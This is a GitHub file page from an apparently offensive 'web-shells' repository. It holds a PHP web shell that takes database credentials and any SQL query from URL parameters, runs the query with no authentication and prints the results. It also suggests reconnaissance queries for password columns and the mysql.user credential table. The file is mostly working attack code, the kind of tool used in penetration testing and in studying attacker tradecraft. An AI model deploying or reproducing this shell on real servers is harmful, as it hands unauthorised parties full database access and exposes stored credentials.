web-shells/mysqlshell.txt at master · strawp/web-shells · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
<pre>
Connect to mysql database using ext/mysql (PHP < 5.5):
Args:
  - host (localhost)
  - port (3306)
  - user
  - pass
  - db: schema name
  - sql
<?php
  /*
    Useful commands
  */
  if( empty( $_GET["sql"] ) ){
    echo "SELECT @@version\n";
    echo "SELECT * FROM information_schema.columns where column_name like '%pass%'\n";
    echo "SHOW TABLES\n";
    echo "SELECT * FROM mysql.user\n";
    exit;
  }
  if( empty( $_GET["host"] ) ) $_GET["host"] = 'localhost';
  $conn = mysql_connect( $_GET["host"], $_GET["user"], $_GET["pass"] );
  if( !$conn ) die("Failed to connect to ".$_GET["host"] );
  mysql_select_db( $_GET["db"] );
  $rlt = mysql_query( $_GET["sql"], $conn );
  echo "Info: ".mysql_info()."\n";
  echo "Error: ".mysql_error()."\n";
  echo "Rows: ".mysql_num_rows( $rlt )."\n";
  echo "Affected rows: ".mysql_affected_rows( $conn )."\n";
  echo "Results:\n";
  $count = 0;
  while( $row = mysql_fetch_assoc( $rlt ) ){
    if( $count == 0 ){
      echo "<table><tr>";
      foreach( $row as $k => $v ){
        echo "<th>$k</th>";
      }
      echo "</tr>\n";
    }
    echo "<tr>";
    foreach( $row as $k => $v ){
      echo "<td>".htmlentities($v)."</td>";
    }
    echo "</tr>\n";
    $count++;
  }
  echo "</table>";
?>
</pre>